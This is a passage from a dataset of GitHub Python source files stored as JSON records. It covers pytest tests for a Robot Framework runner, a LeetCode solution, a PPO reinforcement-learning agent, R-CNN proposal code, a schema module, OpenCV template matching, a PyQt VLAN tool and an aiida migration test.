result\n\n\n@pytest.fixture(scope=\"session\")\ndef run_invalid_tag_worker(provide_invalid_tag) -> Optional[int]:\n    result: Optional[int] = parabot.tag_worker(provide_invalid_tag)\n    return result\n\n\n@pytest.fixture(scope=\"session\")\ndef run_valid_pool_path_workers() -> Union[List[Optional[int]], int]:\n    return parabot.pool_path_workers(\n        parabot.path_worker,\n        [\n            Path(\"examples/test_project_01/suite_01/suite.robot\"),\n            Path(\"examples/test_project_02/suite_01/suite.robot\"),\n        ],\n        timeout=60,\n    )\n\n\n@pytest.fixture(scope=\"session\")\ndef run_timeout_pool_path_workers() -> Union[List[Optional[int]], int]:\n    return parabot.pool_path_workers(\n        parabot.path_worker,\n        [\n            Path(\"examples/test_project_01/suite_01/suite.robot\"),\n            Path(\"examples/test_project_02/suite_01/suite.robot\"),\n        ],\n        timeout=5,\n    )\n\n\n@pytest.fixture(scope=\"session\")\ndef run_valid_pool_tag_workers() -> List[Optional[int]]:\n    return parabot.pool_tag_workers(parabot.tag_worker, [\"reg\", \"smoke\"])\n\n\n@pytest.fixture(\n    scope=\"session\",\n    params=[\n        \"-a\",\n        \"-f examples/test_project_01/suite_01 examples/test_project_02/suite_02\",\n        \"-t reg smoke\",\n    ],\n)\ndef run_e2e(request) -> Any:\n    return run(\n        f\"python3 -m parabot {request.param}\",\n        check=True,\n        shell=True,\n        capture_output=True,\n    )\n\n\nclass TestParabotWorkers:\n    def test_path_worker_valid(self, run_valid_path_worker):\n        status: Optional[int] = run_valid_path_worker\n        assert status is None\n\n    def test_path_worker_invalid(self, run_invalid_path_worker):\n        status: Optional[int] = run_invalid_path_worker\n        assert status == 1\n\n    def test_tag_worker_valid(self, run_valid_tag_worker):\n        status: Optional[int] = run_valid_tag_worker\n        assert status is None\n\n    def test_tag_worker_invalid(self, run_invalid_tag_worker):\n        status: Optional[int] = run_invalid_tag_worker\n        assert status == 1\n\n\nclass TestParabotPools:\n    def test_valid_pool_path_workers(self, run_valid_pool_path_workers):\n        status: List[Optional[int]] = run_valid_pool_path_workers\n        assert 1 not in status\n\n    def test_timeout_pool_path_workers(self, run_timeout_pool_path_workers):\n        status: int = run_timeout_pool_path_workers\n        assert status == 1\n\n    def test_valid_pool_tag_workers(self, run_valid_pool_tag_workers):\n        status: List[Optional[int]] = run_valid_pool_tag_workers\n        check: List[bool] = []\n\n        for stat in status:\n            if stat == 0:\n                check.append(True)\n            else:\n                check.append(False)\n\n        assert all(check) is True\n\n\nclass TestE2E:\n    def test_e2e(self, run_e2e):\n        status: Any = run_e2e\n        assert status.returncode == 0\n","repo_name":"radekBednarik/parabot","sub_path":"tests/test_parabot.py","file_name":"test_parabot.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"57"} +{"seq_id":"20499864725","text":"\n# runtime: O(n * m)\n# space : O(1)\n\nclass Solution:\n    def setZeroes(self, matrix: List[List[int]]) -> None:\n        rows, cols, rZero = len(matrix), len(matrix[0]), False\n\n        # Denote Row/Col to be 0'd\n        for row in range(rows):\n            for col in range(cols):\n                if matrix[row][col] == 0:\n                    matrix[0][col] = 0\n                    if row > 0:\n                        matrix[row][0] = 0\n                    else:\n                        rZero = True\n\n        # Every Row/Col aside from 0th\n        for row in range(1, rows):\n            for col in range(1, cols):\n                if matrix[row][0] == 0 or matrix[0][col] == 0:\n                    matrix[row][col] = 0\n\n        # 0th Col Down\n        if matrix[0][0] == 0:\n            for row in range(rows):\n                matrix[row][0] = 0\n\n        # 0th Row Across\n        if rZero:\n            for col in range(cols):\n                matrix[0][col] 
= 0\n","repo_name":"jrdwe/leet","sub_path":"leet_py/SetMatrixZeroes_73.py","file_name":"SetMatrixZeroes_73.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"72884452659","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport tensorflow as tf\nimport numpy as np\n\n\nfrom hobotrl.playback import BatchIterator, MapPlayback, to_columnwise, to_rowwise\nimport hobotrl.network as network\nimport hobotrl.sampling as sampling\nimport hobotrl.target_estimate as target_estimate\nimport hobotrl.tf_dependent.distribution as distribution\nfrom hobotrl.tf_dependent.base import BaseDeepAgent\nfrom value_based import GreedyStateValueFunction\nfrom hobotrl.policy import StochasticPolicy\n\n\nclass PPOUpdater(network.NetworkUpdater):\n def __init__(self, policy_dist, old_dist, v_function, old_v_function, target_estimator,\n entropy=1e-1, clip_epsilon=0.1, value_weight=1.0):\n \"\"\"\n :param policy_dist:\n :type policy_dist: distribution.NNDistribution\n :param old_dist:\n :type old_dist: distribution.NNDistribution\n :param v_function: Function calculating state value\n :type v_function: network.NetworkFunction\n :param old_v_function: Function calculation old state value\n :type old_v_function: network.NetworkFunction\n :param target_estimator:\n :type target_estimator:\n :param entropy: entropy weight, c2 in paper\n :param value_weight: value function loss weight, c1 in paper\n :param clip_epsilon: clipped value of prob ratio\n \"\"\"\n super(PPOUpdater, self).__init__()\n self._policy_dist, self._old_dist = policy_dist, old_dist\n self._v_function, self._old_v_function = v_function, old_v_function\n self._target_estimator = target_estimator\n self._entropy = entropy\n with tf.name_scope(\"PPOUpdater\"):\n with tf.name_scope(\"input\"):\n self._input_target_v = tf.placeholder(dtype=tf.float32, shape=[None], name=\"input_target_v\")\n self._input_action = policy_dist.input_sample()\n self._input_entropy = tf.placeholder(dtype=tf.float32, shape=[], name=\"input_entropy\")\n op_v = v_function.output().op\n old_op_v = tf.stop_gradient(old_v_function.output().op)\n with tf.name_scope(\"value\"):\n td = self._input_target_v - op_v\n org_v_loss = network.Utils.clipped_square(td)\n clipped_v = old_op_v + tf.clip_by_value(op_v - old_op_v, -clip_epsilon, clip_epsilon)\n clip_v_loss = network.Utils.clipped_square(self._input_target_v - clipped_v)\n self._v_loss = tf.reduce_mean(tf.maximum(org_v_loss, clip_v_loss))\n self._org_v_loss, self._clip_v_loss = org_v_loss, clip_v_loss\n with tf.name_scope(\"policy\"):\n advantage = self._input_target_v - op_v\n self._advantage = advantage\n _mean, _var = tf.nn.moments(advantage, axes=[0])\n self._std_advantage = tf.stop_gradient(advantage / (tf.sqrt(_var) + 1.0))\n ratio = tf.exp(policy_dist.log_prob() - tf.stop_gradient(old_dist.log_prob()))\n clipped_ratio = tf.clip_by_value(ratio, 1.0 - clip_epsilon, 1.0 + clip_epsilon)\n pi_loss = tf.reduce_mean(tf.minimum(ratio * self._std_advantage, clipped_ratio * self._std_advantage))\n entropy_loss = tf.reduce_mean(self._policy_dist.entropy())\n self._pi_loss = pi_loss\n self._ratio, self._clipped_ratio = ratio, clipped_ratio\n self._op_loss = value_weight * self._v_loss - (self._pi_loss + self._input_entropy * entropy_loss)\n self._update_operation = network.MinimizeLoss(self._op_loss,\n var_list=self._v_function.variables +\n self._policy_dist._dist_function.variables)\n\n def declare_update(self):\n return 
self._update_operation\n\n def update(self, sess, batch, *args, **kwargs):\n state, action, reward, next_state, episode_done = batch[\"state\"], \\\n batch[\"action\"], \\\n batch[\"reward\"], \\\n batch[\"next_state\"], \\\n batch[\"episode_done\"]\n target_value = self._target_estimator.estimate(state, action, reward, next_state, episode_done)\n feed_dict = self._v_function.input_dict(state)\n feed_dict.update(self._policy_dist.dist_function().input_dict(state))\n feed_more = {\n self._input_action: action,\n self._input_target_v: target_value,\n self._input_entropy: self._entropy\n }\n feed_dict.update(feed_more)\n fetch_dict = {\n \"advantage\": self._advantage,\n \"target_value\": target_value,\n \"pi_loss\": self._pi_loss,\n \"pi_ratio\": self._ratio,\n \"pi_ratio_clip\": self._clipped_ratio,\n \"v_loss\": self._v_loss,\n \"v_loss_org\": self._org_v_loss,\n \"v_loss_clip\": self._clip_v_loss,\n \"entropy\": self._policy_dist.entropy(),\n \"log_prob\": self._policy_dist.log_prob(),\n \"advantage_std\": self._std_advantage,\n }\n if isinstance(self._policy_dist, distribution.NormalDistribution):\n fetch_dict.update({\n \"stddev\": self._policy_dist.stddev(),\n \"mean\": self._policy_dist.mean()\n })\n else:\n pass\n return network.UpdateRun(feed_dict=feed_dict, fetch_dict=fetch_dict)\n\n\nclass PPO(sampling.TrajectoryBatchUpdate,\n BaseDeepAgent):\n def __init__(self,\n f_create_net, state_shape,\n # PPO arguments\n discount_factor, entropy=1e-3, clip_epsilon=0.2,\n # update arguments\n epoch_per_step=4,\n # target estimate\n target_estimator=None,\n # optimizer arguments\n network_optimizer=None, max_gradient=10.0,\n # sampler arguments\n sampler=None,\n batch_size=32,\n horizon=1024,\n\n *args, **kwargs):\n \"\"\"\n :param f_create_net: function: f_create_net(inputs) => {\"pi\": dist_pi, \"q\": q_values},\n in which {inputs} is [input_state],\n {dist_pi} is probability distribution of policy with shape [None, num_actions],\n {q_values} is Q values with shape [None, num_actions];\n or f_create_net(inputs) => {\"mean\": mean, \"stddev\": stddev, \"v\": v},\n in which {mean} {stddev} is mean and stddev if normal distribution for continuous actions,\n {v} is state value.\n :param state_shape:\n :param discount_factor:\n :param entropy: entropy regulator weight.\n :param target_estimator: optional, default to target_estimate.NStepTD\n :type target_estimator.TargetEstimator\n :param network_optimizer: optional, default to network.LocalNetworkOptimizer\n :type network_optimizer: network.NetworkOptimizer\n :param max_gradient: optional, max_gradient clip value\n :param sampler: optional, default to sampling.TrajectoryOnSampler.\n if None, a TrajectoryOnSampler will be created using batch_size.\n :type sampler: sampling.Sampler\n :param batch_size: optional, batch_size when creating sampler\n :param args:\n :param kwargs:\n \"\"\"\n kwargs.update({\n \"f_create_net\": f_create_net,\n \"state_shape\": state_shape,\n \"discount_factor\": discount_factor,\n \"entropy\": entropy,\n \"target_estimator\": target_estimator,\n \"max_gradient\": max_gradient,\n \"batch_size\": batch_size,\n \"horizon\": horizon,\n \"clip_epsilon\": clip_epsilon,\n \"epoch_per_step\": epoch_per_step,\n })\n if network_optimizer is None:\n network_optimizer = network.LocalOptimizer(grad_clip=max_gradient)\n if sampler is None:\n sampler = sampling.TrajectoryOnSampler(interval=horizon, check_episode_done=False)\n kwargs.update({\"sampler\": sampler})\n\n super(PPO, self).__init__(*args, **kwargs)\n\n self._epoch_py_step 
= epoch_per_step\n self._batch_size = batch_size\n\n pi = self.network[\"pi\"]\n if pi is not None:\n # discrete action: pi is categorical probability distribution\n self._input_action = tf.placeholder(dtype=tf.uint8, shape=[None], name=\"input_action\")\n self._pi_function = network.NetworkFunction(self.network[\"pi\"])\n self._pi_distribution = distribution.DiscreteDistribution(self._pi_function, self._input_action)\n self._old_pi_function = network.NetworkFunction(self._old_network[\"pi\"])\n self._old_pi_distribution = distribution.DiscreteDistribution(self._old_pi_function, self._input_action)\n q = self.network[\"q\"]\n if q is not None:\n # network outputs q\n self._q_function = network.NetworkFunction(q)\n self._v_function = GreedyStateValueFunction(self._q_function)\n self._old_q_function = network.NetworkFunction(self._old_network[\"q\"])\n self._old_v_function = GreedyStateValueFunction(self._old_q_function)\n else:\n # network output v\n self._v_function = network.NetworkFunction(self.network[\"v\"])\n self._old_v_function = network.NetworkFunction(self._old_network[\"v\"])\n else:\n # continuous action: mean / stddev represents normal distribution\n dim_action = self.network[\"mean\"].op.shape.as_list()[-1]\n self._input_action = tf.placeholder(dtype=tf.float32, shape=[None, dim_action], name=\"input_action\")\n self._pi_function = network.NetworkFunction(\n outputs={\"mean\": self.network[\"mean\"], \"stddev\": self.network[\"stddev\"]},\n inputs=self.network.inputs\n )\n self._pi_distribution = distribution.NormalDistribution(self._pi_function, self._input_action)\n self._v_function = network.NetworkFunction(self.network[\"v\"])\n self._old_pi_function = network.NetworkFunction(\n outputs={\"mean\": self._old_network[\"mean\"], \"stddev\": self._old_network[\"stddev\"]},\n inputs=self._old_network.inputs\n )\n self._old_pi_distribution = distribution.NormalDistribution(self._old_pi_function, self._input_action)\n self._old_v_function = network.NetworkFunction(self._old_network[\"v\"])\n if target_estimator is None:\n target_estimator = target_estimate.GAENStep(self._v_function, discount_factor)\n self.network_optimizer = network_optimizer\n network_optimizer.add_updater(\n PPOUpdater(policy_dist=self._pi_distribution,\n old_dist=self._old_pi_distribution,\n v_function=self._v_function,\n old_v_function=self._old_v_function,\n target_estimator=target_estimator,\n entropy=entropy,\n clip_epsilon=clip_epsilon), name=\"ppo\")\n network_optimizer.add_updater(network.L2(self.network), name=\"l2\")\n network_optimizer.compile()\n\n self._policy = StochasticPolicy(self._pi_distribution)\n\n def init_network(self, f_create_net, state_shape, *args, **kwargs):\n input_state = tf.placeholder(dtype=tf.float32, shape=[None] + list(state_shape), name=\"input_state\")\n net = network.Network([input_state], f_create_net, var_scope=\"learn\")\n self._old_network = network.Network([input_state], f_create_net, var_scope=\"old\")\n self._old_network_syncer = network.NetworkSyncer(net, self._old_network)\n return net\n\n def update_on_trajectory(self, batch):\n # here we receive batch of size horizon.\n infos = []\n info = {}\n for i in range(self._epoch_py_step):\n for mini_batch in BatchIterator(batch, self._batch_size, check_episode_done=True):\n self.network_optimizer.update(\"ppo\", self.sess, mini_batch)\n self.network_optimizer.update(\"l2\", self.sess)\n info = self.network_optimizer.optimize_step(self.sess)\n info = dict([(k, np.mean(info[k])) for k in info])\n infos.append(info)\n 
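# --- Illustrative aside (not part of the original hobotrl file) ---------------
# The quantity PPOUpdater optimizes on every minibatch above is the clipped
# surrogate objective from the PPO paper. A NumPy sketch of just that term;
# eps matches the clip_epsilon default of 0.2, and the sample numbers are
# made up:
import numpy as np


def _clipped_surrogate(logp_new, logp_old, adv, eps=0.2):
    # ratio = pi_new(a|s) / pi_old(a|s), recovered from log-probabilities
    ratio = np.exp(logp_new - logp_old)
    clipped = np.clip(ratio, 1.0 - eps, 1.0 + eps)
    # objective to *maximize*; PPOUpdater enters it into _op_loss with a
    # minus sign, next to the clipped value loss and the entropy bonus
    return np.mean(np.minimum(ratio * adv, clipped * adv))


_logp_old = np.log(np.array([0.2, 0.5, 0.3]))
_logp_new = np.log(np.array([0.3, 0.4, 0.3]))
_adv = np.array([1.0, -0.5, 0.2])
print(_clipped_surrogate(_logp_new, _logp_old, _adv))
# -----------------------------------------------------------------------------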
self._old_network_syncer.sync(self.sess, 1.0)\n\n        return to_columnwise(infos), {}\n\n    def set_session(self, sess):\n        super(PPO, self).set_session(sess)\n        self.network.set_session(sess)\n        self._old_network.set_session(sess)\n        self._pi_distribution.set_session(sess)\n        self._old_pi_distribution.set_session(sess)\n\n    def act(self, state, **kwargs):\n        return self._policy.act(state, **kwargs)\n\n","repo_name":"hobotrl/hobotrl","sub_path":"hobotrl/algorithms/ppo.py","file_name":"ppo.py","file_ext":"py","file_size_in_byte":13004,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"57"} +{"seq_id":"16053921361","text":"# encoding: utf-8\r\n\"\"\"\r\n@author: zeming li\r\n@contact: zengarden2009@gmail.com\r\n\"\"\"\r\n\r\nfrom libs.configs import cfgs\r\nfrom libs.box_utils import encode_and_decode\r\nfrom libs.box_utils import boxes_utils\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\ndef postprocess_rpn_proposals(rpn_bbox_pred, rpn_cls_prob, img_shape, anchors, is_training):\r\n    '''\r\n\r\n    :param rpn_bbox_pred: [-1, 4]\r\n    :param rpn_cls_prob: [-1, 2]\r\n    :param img_shape:\r\n    :param anchors:[-1, 4]\r\n    :param is_training:\r\n    :return:\r\n    '''\r\n\r\n    if is_training:\r\n        pre_nms_topN = cfgs.RPN_TOP_K_NMS_TRAIN  # default: 12000\r\n        post_nms_topN = cfgs.RPN_MAXIMUM_PROPOSAL_TARIN  # default: 2000\r\n        nms_thresh = cfgs.RPN_NMS_IOU_THRESHOLD  # default: 0.7\r\n    else:\r\n        pre_nms_topN = cfgs.RPN_TOP_K_NMS_TEST  # default: 6000\r\n        post_nms_topN = cfgs.RPN_MAXIMUM_PROPOSAL_TEST  # default: 300\r\n        nms_thresh = cfgs.RPN_NMS_IOU_THRESHOLD  # default: 0.7\r\n\r\n    cls_prob = rpn_cls_prob[:, 1]\r\n\r\n    # 1. decode boxes\r\n    # clw note: this function takes the RPN's predicted box offsets, the predicted class scores (two classes),\r\n    # the image size, and the generated anchors as input. Decoding yields the actual predicted box positions.\r\n    # Since there may be fewer predicted boxes than the configured top-N count, the minimum of the two counts\r\n    # is taken, then tf.image.non_max_suppression is applied and the final top-K boxes after NMS are kept.\r\n    # In the original paper this is 12000 boxes before NMS (cfgs.RPN_TOP_K_NMS_TRAIN above) and 2000 after\r\n    # NMS (cfgs.RPN_MAXIMUM_PROPOSAL_TARIN). No box is assigned to a specific object class here yet; we only\r\n    # select the top-K boxes that are likely to contain an object.\r\n    decode_boxes = encode_and_decode.decode_boxes(encoded_boxes=rpn_bbox_pred,\r\n                                                  reference_boxes=anchors,\r\n                                                  scale_factors=cfgs.ANCHOR_SCALE_FACTORS)\r\n\r\n    # decode_boxes = encode_and_decode.decode_boxes(boxes=anchors,\r\n    #                                               deltas=rpn_bbox_pred,\r\n    #                                               scale_factor=None)\r\n\r\n    # 2. clip to img boundaries\r\n    decode_boxes = boxes_utils.clip_boxes_to_img_boundaries(decode_boxes=decode_boxes,\r\n                                                            img_shape=img_shape)\r\n\r\n    # 3. get top N to NMS\r\n    if pre_nms_topN > 0:  # clw note: after the initial set of boxes (~60*40*9=20k) is obtained, anchors crossing\r\n                          # the image boundary are dropped on the training set, which greatly reduces the count,\r\n                          # i.e. the top-K boxes before NMS (default 12k here, 6k in the paper); NMS runs afterwards.\r\n        pre_nms_topN = tf.minimum(pre_nms_topN, tf.shape(decode_boxes)[0], name='avoid_unenough_boxes')\r\n        cls_prob, top_k_indices = tf.nn.top_k(cls_prob, k=pre_nms_topN)\r\n        decode_boxes = tf.gather(decode_boxes, top_k_indices)\r\n\r\n    # 4. 
NMS\r\n    keep = tf.image.non_max_suppression(\r\n        boxes=decode_boxes,\r\n        scores=cls_prob,\r\n        max_output_size=post_nms_topN,\r\n        iou_threshold=nms_thresh)\r\n\r\n    final_boxes = tf.gather(decode_boxes, keep)\r\n    final_probs = tf.gather(cls_prob, keep)\r\n\r\n    return final_boxes, final_probs\r\n\r\n","repo_name":"clw5180/TensorFlow_Practice","sub_path":"Faster-RCNN_Tensorflow/libs/detection_oprations/proposal_opr.py","file_name":"proposal_opr.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"38894781362","text":"from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QStyle, QPushButton\nfrom PyQt5.QtWidgets import QVBoxLayout, QTabWidget, QMessageBox\nimport sys\nfrom aego.pyqt import qt5\nfrom aego.pyqt.text_viewer_dialog import TextViewerDialog\nfrom data.gui_vlans_widgets import FoundVlansWidget, MissedVlansWidget\nfrom data.gui_commands_widgets import TypicalCommandsWidget, NewCommandsWidget, CustomCommandsWidget\n\n\nclass SwVlans(QMainWindow):\n    _VERSION = \"2.0\"\n    _TITLE = \"SwVlans\"\n\n    def __init__(self):\n        super(SwVlans, self).__init__()\n        self.setWindowTitle(f\"{self._TITLE} {self._VERSION}\")\n        self.setWindowIcon(self.style().standardIcon(QStyle.SP_DesktopIcon))\n        self.resize(400, 0)\n\n        self._init_ui()\n\n    def _init_ui(self):\n        widgets = {\n            FoundVlansWidget(\"Config 1\"),\n            FoundVlansWidget(\"Config 2\")\n        }\n        self._vlan_tab = QTabWidget()\n        for widget in widgets:\n            self._vlan_tab.addTab(widget, widget.name)\n        self._vlan_tab.addTab(MissedVlansWidget(*widgets), \"Missing vlans\")\n\n        self._command_tab = QTabWidget()\n        self._command_tab.addTab(TypicalCommandsWidget(), \"Typical commands\")\n        self._command_tab.addTab(NewCommandsWidget(), \"New commands\")\n        self._command_tab.addTab(CustomCommandsWidget(), \"Custom output\")\n\n        self._run_compiling_btn = QPushButton(\"Run\")\n        self._run_compiling_btn.clicked.connect(self._run_compiling)\n\n        main_layout = QVBoxLayout()\n        main_layout.addWidget(self._vlan_tab)\n        main_layout.addWidget(self._command_tab)\n        main_layout.addWidget(self._run_compiling_btn)\n        main_widget = QWidget()\n        main_widget.setLayout(main_layout)\n        self.setCentralWidget(main_widget)\n\n    def _run_compiling(self):\n        \"\"\"Runs compilation of the commands.\"\"\"\n        vlans = self._vlan_tab.currentWidget().get()\n        compiler, ports = self._command_tab.currentWidget().get()\n        text = compiler(vlans, ports)\n        TextViewerDialog(text, self._TITLE).exec()\n\n    def closeEvent(self, event):\n        \"\"\"Window close event.\"\"\"\n        event_ = QMessageBox.question(self, \"Question\", \"Are you sure you want to quit?\",\n                                      QMessageBox.Yes | QMessageBox.No,\n                                      QMessageBox.No)\n        if event_ == QMessageBox.No:\n            event.ignore()\n\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n    qt5.set_translator(app)  # language pack\n    window = SwVlans()\n    window.show()\n    sys.exit(app.exec())\n","repo_name":"staego/pt_tools","sub_path":"sw_vlans/sw_vlans.pyw","file_name":"sw_vlans.pyw","file_ext":"pyw","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"70441642098","text":"#coding: utf-8\nu\"\"\"Caty schema module.\nThroughout the application, Caty uses its own schema language based on JSON Schema.\nThis module does not define the schema syntax itself; it defines how schemas behave.\n\n== Overview\n\nThe 
schema module in Caty is implemented by the following submodules:\n\n;caty.core.schema.base\n:base classes for all schemas, plus the implementations of union types, tagged types, user-defined types, etc.\n;caty.core.schema.number\n:implementation of the number (integer) types\n;caty.core.schema.string\n:implementation of the string type\n;caty.core.schema.binary\n:implementation of the binary type\n;caty.core.schema.bool\n:implementation of the boolean type\n;caty.core.schema.object\n:implementation of the object type\n;caty.core.schema.array\n:implementation of the array type\n\nThese modules define the following built-in types:\n\n* integer\n* number\n* string\n* binary\n* boolean\n* object\n* array\n* any\n* null\n* void\n* never\n\nThe types above, and tags applied to them, are unconditionally available.\nEvery type not in the list above is a user-defined type.\nThis also holds for the types defined in the Caty framework's standard library;\nthe phrase \"types defined in the Caty core\" refers only to the built-in types above.\n\n== Where schemas are used\n\nSchemas are mainly used in the following situations:\n\n* type validation inside Caty scripts\n* conversion of external input\n\nSee the caty.core.script module for details on Caty scripts.\nCaty script is a strongly typed language, and its type system is the Caty schema.\nSchemas also provide value conversion, not just validation.\nThis is mainly applied to Web input: data entered into forms is converted\nthrough a schema into objects usable inside Caty, while malformed input is rejected at the same time.\n\"\"\"\n\nfrom caty.core.schema.base import *\nfrom caty.core.schema.number import NumberSchema, IntegerSchema\nfrom caty.core.schema.string import StringSchema\nfrom caty.core.schema.binary import BinarySchema\nfrom caty.core.schema.bool import BoolSchema\nfrom caty.core.schema.array import ArraySchema\nfrom caty.core.schema.object import ObjectSchema, PseudoTag\nfrom caty.core.schema.enum import EnumSchema\nfrom caty.core.schema.bag import BagSchema\nfrom caty.core.schema.exponent import ExponentSchema\n__all__ = [\n    \"SchemaBase\",\n    \"OperatorSchema\",\n    \"UnionSchema\",\n    \"IntersectionSchema\",\n    \"UpdatorSchema\",\n    \"TagSchema\",\n    \"ScalarSchema\",\n    \"AnySchema\",\n    \"NullSchema\",\n    \"VoidSchema\",\n    \"NeverSchema\",\n    \"UndefinedSchema\",\n    \"TypeVariable\",\n    \"OptionalSchema\",\n    \"UnivSchema\",\n    \"ForeignSchema\",\n    \"NamedSchema\",\n    \"TypeReference\",\n    \"OverlayedDict\",\n    \"SchemaAttribute\",\n    \"Annotations\",\n    \"Annotation\",\n    \"NumberSchema\",\n    \"IntegerSchema\",\n    \"StringSchema\",\n    \"BinarySchema\",\n    \"BoolSchema\",\n    \"ArraySchema\",\n    \"ObjectSchema\",\n    \"PseudoTag\",\n    \"EnumSchema\",\n    \"ValueSchema\",\n    \"BagSchema\",\n    \"UnaryOpSchema\",\n    \"ExtractorSchema\",\n    \"ExponentSchema\",\n    \"EmptySchema\",\n    \"IndefSchema\",\n    \"types\",\n    \"schemata\",\n]\n# Built-in and default schema definitions\ntypes = {\n    'integer': IntegerSchema(),\n    'number': NumberSchema({}),\n    'string': StringSchema({}),\n    'binary': BinarySchema({}),\n    'boolean': BoolSchema({}),\n    'array': ArraySchema([UnivSchema()], options={'repeat': True}),\n    'object': ObjectSchema(schema_obj={}, wildcard=UnivSchema({})),\n    'any': AnySchema({}),\n    'null': NullSchema({}),\n    'void': VoidSchema({}),\n    'never': NeverSchema({}),\n    'bag': BagSchema([]),\n    'undefined': OptionalSchema(UndefinedSchema()),\n    'univ': UnivSchema({}),\n    'indef': IndefSchema({}),\n    'foreign': ForeignSchema({}),\n}\n\nschemata = types # kept for now to preserve backwards compatibility\n\n","repo_name":"hidaruma/caty","sub_path":"python/caty/core/schema/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"39211900155","text":"import cv2 as cv\r\nfrom matplotlib import pyplot as plt\r\nimport copy\r\nimport imutils\r\n\r\ndef main():\r\n    print(\"Multiscaling Template Matching\")\r\n    main_img = cv.imread(\"TestData/img1.jpg\")\r\n    resize_image = main_img.copy()\r\n    template = cv.imread(\"TestData/img1t1.jpg\")\r\n    template_w, template_h = template.shape[:-1]\r\n    result_dict = {}\r\n\r\n    method = 'cv.TM_SQDIFF_NORMED'\r\n    scaling_factor = 1.15 # factor by which the original image will 
be scaled\r\n    limiting_factor = 2 # factor indicating max resizing of the original image\r\n\r\n    while resize_image.shape[0] < main_img.shape[0] * limiting_factor and \\\r\n            resize_image.shape[1] < main_img.shape[1] * limiting_factor:\r\n        result = cv.matchTemplate(resize_image, template, eval(method))\r\n        minVal, maxVal, minLoc, maxLoc = cv.minMaxLoc(result)\r\n        result_dict[resize_image.shape] = [minVal, maxVal, minLoc, maxLoc]\r\n        resize_image = imutils.resize(resize_image, width=int(resize_image.shape[1] * scaling_factor),\r\n                                      height=resize_image.shape[0],\r\n                                      inter=cv.INTER_CUBIC)\r\n\r\n    # debug code\r\n\r\n    # main_img_copy = main_img.copy() # debug\r\n    #\r\n    # if eval(method) in [cv.TM_SQDIFF, cv.TM_SQDIFF_NORMED]:\r\n    #     top_left = minLoc\r\n    # else:\r\n    #     top_left = maxLoc\r\n    #\r\n    # bottom_right = (top_left[0] + template_w, top_left[1] + template_h)\r\n    #\r\n    # cv.rectangle(main_img_copy, top_left, bottom_right, 255, 2)\r\n    #\r\n    # plt.subplot(121), plt.imshow(result, cmap='gray')\r\n    # plt.title('matching result'), plt.xticks([]), plt.yticks([])\r\n    # plt.subplot(122), plt.imshow(main_img_copy, cmap='gray')\r\n    # plt.title('Detected Point'), plt.xticks([]), plt.yticks([])\r\n    # plt.suptitle(\"Name\")\r\n    # plt.show()\r\n\r\n    for key in result_dict: # debug\r\n        print(key)\r\n\r\n    if eval(method) in [cv.TM_SQDIFF, cv.TM_SQDIFF_NORMED]:\r\n        key = find_minVal(result_dict)\r\n        top_left = result_dict[key][2]\r\n    else:\r\n        key = find_maxVal(result_dict)\r\n        top_left = result_dict[key][3]\r\n\r\n    bottom_right = (top_left[0] + template_w, top_left[1] + template_h)\r\n\r\n    mainImgResize = main_img.copy()\r\n    mainImgResize = imutils.resize(mainImgResize, width=key[1], height=key[0],\r\n                                   inter=cv.INTER_CUBIC)\r\n\r\n    cv.rectangle(mainImgResize, top_left, bottom_right, 255, 2)\r\n\r\n    plt.subplot(121), plt.imshow(main_img, cmap='gray')\r\n    plt.title('matching result'), plt.xticks([]), plt.yticks([])\r\n    plt.subplot(122), plt.imshow(mainImgResize, cmap='gray')\r\n    plt.title('Detected Point'), plt.xticks([]), plt.yticks([])\r\n    plt.suptitle(\"Name\")\r\n    plt.show()\r\n\r\n\r\ndef find_minVal(dict):\r\n    minKey = list(dict.keys())[0]\r\n    for key in dict:\r\n        if dict[key][0] < dict[minKey][0]:\r\n            minKey = key\r\n\r\n    return minKey\r\n\r\ndef find_maxVal(dict):\r\n    maxKey = list(dict.keys())[0]\r\n    for key in dict:\r\n        if dict[key][1] > dict[maxKey][1]:\r\n            maxKey = key\r\n\r\n    return maxKey\r\n\r\nif __name__==\"__main__\":\r\n    main()\r\n    # resize_Image()","repo_name":"Brij98/Jigsaw_Puzzle_Solver","sub_path":"multiscaling_template_matching.py","file_name":"multiscaling_template_matching.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"28224753795","text":"from aiida.tools.importexport.migration.v04_to_v05 import migrate_v4_to_v5\n\nfrom . 
import ArchiveMigrationTest\n\n\nclass TestMigrate(ArchiveMigrationTest):\n \"\"\"Tests specific for this archive migration.\"\"\"\n\n def test_migrate_external(self):\n \"\"\"Test the migration on the test archive provided by the external test package.\"\"\"\n metadata, data = self.migrate('export_v0.4.aiida', '0.4', '0.5', migrate_v4_to_v5)\n\n # Check schema-changes\n removed_computer_attrs = {'transport_params'}\n removed_node_attrs = {'nodeversion', 'public'}\n for change in removed_computer_attrs:\n # data.json\n for computer in data['export_data']['Computer'].values():\n self.assertNotIn(change, computer, msg=\"'{}' unexpectedly found for {}\".format(change, computer))\n # metadata.json\n self.assertNotIn(\n change,\n metadata['all_fields_info']['Computer'],\n msg=\"'{}' unexpectedly found in metadata.json for Computer\".format(change)\n )\n for change in removed_node_attrs:\n # data.json\n for node in data['export_data']['Node'].values():\n self.assertNotIn(change, node, msg=\"'{}' unexpectedly found for {}\".format(change, node))\n # metadata.json\n self.assertNotIn(\n change,\n metadata['all_fields_info']['Node'],\n msg=\"'{}' unexpectedly found in metadata.json for Node\".format(change)\n 